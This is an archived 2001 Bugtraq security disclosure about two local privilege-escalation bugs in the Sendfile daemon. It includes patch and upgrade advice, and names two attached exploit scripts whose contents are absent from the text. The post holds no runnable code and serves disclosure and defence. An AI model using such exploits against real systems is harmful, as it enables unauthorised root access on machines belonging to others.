[20641] in bugtraq


Sendfile daemon bugs

daemon@ATHENA.MIT.EDU (psheep@hushmail.com)
Tue May 15 20:35:31 2001

From: psheep@hushmail.com
Message-Id: <200105151508.IAA23819@user8.hushmail.com>
Date: Tue, 15 May 2001 09:10:49 -0700 (MDT)
To: bugtraq@securityfocus.com
Mime-version: 1.0
Content-type: multipart/mixed; boundary="Hushpart_boundary_GukWoYKuBtOcoIAUGcatDzBUgcJVTMvC"

--Hushpart_boundary_GukWoYKuBtOcoIAUGcatDzBUgcJVTMvC
Content-type: text/plain

I have attached two simple scripts which exploit vulnerabilities which exist 
in some versions of the Sendfile daemon; both allow a local attacker 
to gain superuser privileges.

The bug exploited by sfdfwd.sh was supposed to have been fixed by the patches 
provided in Debian Security Advisory DSA-050-1 and then DSA-052-1 and was 
reported by Colin Phipps in November 2000; somehow it has still not been 
fixed.  The second bug has been reported (without any success) to Debian; 
it is the result of a serialization error combined with a lack of error 
checking.

Anyone using this package should download the most recent copy of the source 
code directly from the author's site and manually compile it, or apply the 
patch used in Debian-unstable (sendfile_2.1-25).  Up-to-date copies of the 
source can be obtained from ftp://ftp.belwue.de/pub/unix/sendfile/current

--Hushpart_boundary_GukWoYKuBtOcoIAUGcatDzBUgcJVTMvC
Content-Disposition: attachment
Content-type: application/octet-stream; name="sfdfwd.sh"
Content-Transfer-Encoding: base64
--Hushpart_boundary_GukWoYKuBtOcoIAUGcatDzBUgcJVTMvC
Content-Disposition: attachment
Content-type: application/octet-stream; name="sfdnfy.sh"
Content-Transfer-Encoding: base64
--Hushpart_boundary_GukWoYKuBtOcoIAUGcatDzBUgcJVTMvC--

